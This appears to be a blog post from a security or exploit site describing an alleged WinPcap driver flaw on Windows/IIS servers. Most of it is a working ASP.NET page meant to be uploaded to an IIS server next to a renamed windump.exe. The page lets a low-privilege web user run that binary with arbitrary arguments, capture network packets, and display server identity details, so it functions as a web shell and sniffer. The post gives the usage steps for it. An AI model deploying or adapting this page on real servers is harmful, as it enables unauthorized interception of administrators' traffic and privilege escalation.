9 Oct

bug in winpcap

Posted by daphne in Exploits / BUG Decryption |

BUG IN WINPCAP

I feel God Is here .

Hi dear , I’M Daphne , My job is Penetration Tester (Pen-Tester) , I write About This Subject and Around  .

Pent-Test is Cool & funny job with hacking interesting subject.

anyway ….

I use winpcap 4.2(last version)

http://www.winpcap.org/install/default.htm

what is winpcap :

WinPcap is the industry-standard tool for link-layer network access in Windows environments: it allows applications to capture and transmit network packets bypassing the protocol stack, and has additional useful features, including kernel-level packet filtering, a network statistics engine and support for remote packet capture.

WinPcap consists of a driver, that extends the operating system to provide low-level network access, and a library that is used to easily access the low-level network layers. This library also contains the Windows version of the well known libpcap Unix API.

How to load winpcap in windows :

BUG :

when Administrator or Other Power users in windows summon winpcap driver (such as wireshake or nmap or cain or …) driver loaded !

but , when close program , winpcap driver still in memory , That’s it .

when driver not unload , Guest user or IIS_User can load this driver in kernel level , and SNNIFF Admin Packet in administrator Level or get  Administrator privilege .

I sniff packet with win dump in guest mod .
http://www.winpcap.org/windump/install/default.htm

Ok , I write This little tools for iis7 – iis6 in windows 2003 – 2008 :

usage :

load wireshake or other tool that run winpcap driver .

rename windump.exe to packet.exe and upload near winpcap.aspx and run it .

and then you can sniffed packed in 1.txt /

winpcap.aspx

<%@ Page Language=”VB” Debug=”true” %>
<%@ import Namespace=”system.IO” %>
<%@ import Namespace=”System.Diagnostics” %>
<script runat=”server”>
Sub RunCmd(Src As Object, E As EventArgs)
Dim myProcess As New Process()
‘ Change Path Of tcpdump
Dim myProcessStartInfo As New ProcessStartInfo(Server.MapPath(”packet.exe”))
myProcessStartInfo.UseShellExecute = False
myProcessStartInfo.RedirectStandardOutput = true
myProcess.StartInfo = myProcessStartInfo
myProcessStartInfo.Arguments=xCmd.text
myProcess.Start()
Dim myStreamReader As StreamReader = myProcess.StandardOutput
Dim myString As String = myStreamReader.Readtoend()
myProcess.Close()
mystring=replace(mystring,”<”,”&lt;”)
mystring=replace(mystring,”>”,”&gt;”)
result.text= vbcrlf & “<pre>” & mystring & “</pre>”
End Sub</script>
<form runat=”server”>
New Method Of Packet Sniffing In web whith Public Accesss .
<br />
This Program Run is AS IS !
<strong><span class=”style-2″>Serve rip</span></strong> :<span class=”style-2″>  <%=request.ServerVariables(”LOCAL_ADDR”)%></span><br>
<strong><span class=”style-2″>Machine Name</span></strong> :<span class=”style-2″> <%=Environment.MachineName%></span><br>
<strong><span class=”style-2″>Network Name</span></strong> :<span class=”style-2″> <%=Environment.UserDomainName.ToString()%></span><br>
<strong><span class=”style-2″>User Name</span></strong> :<span class=”style-2″> <%=Environment.UserName%></span> <br>
<strong><span class=”style-2″>OS Version</span></strong> :<span class=”style-2″> <%=Environment.OSVersion.ToString()%></span><br>
<strong><span class=”style-2″>IIS Version</span></strong> :<span class=”style-2″> <%=request.ServerVariables(”SERVER_SOFTWARE”)%></span><br>
<strong><span class=”style-2″>HTTPS</span></strong> <span class=”style-2″>: <%=request.ServerVariables(”HTTPS”)%></span><br>
</tr>
<br />
Tested On Windows vista , IIS7 .
<br />
<h5>Discover By “DAPHNE IDEA SECURITY ” .</h5>
<br />
Exp: -i 6 -w “c:\windows\temp\packet.txt”
<hr />
<asp:Label id=”L_p” style=”COLOR: #0000ff” runat=”server” width=”80px”>TCP DUMP PATH:</asp:Label>
<br />
<label><%=Server.MapPath(”packet.exe”)%></label>
</asp:TextBox>
<br />
<asp:Label id=”L_a” style=”COLOR: #0000ff” runat=”server” width=”80px”>Arguments</asp:Label>
<asp:TextBox id=”xcmd” style=”BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; BORDER-BOTTOM: #084b8e 1px solid” runat=”server” Width=”300px”>-D</asp:TextBox>
<br />
<br />
<asp:Button id=”Button” style=”BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; COLOR: #ffffff; BORDER-BOTTOM: #084b8e 1px solid; BACKGROUND-COLOR: #000000″ onclick=”runcmd” runat=”server” Width=”100px” Text=”DUMP PAcket”></asp:Button>
<p>
<asp:Label id=”result” style=”COLOR: #0000ff” runat=”server”></asp:Label>
</p>
</form>

this tools is sample .

in future i speak about how to Privilege escalation with kartoffell tools in drivers .;)

Comments are closed.

Get Adobe Flash playerPlugin by wpburn.com wordpress themes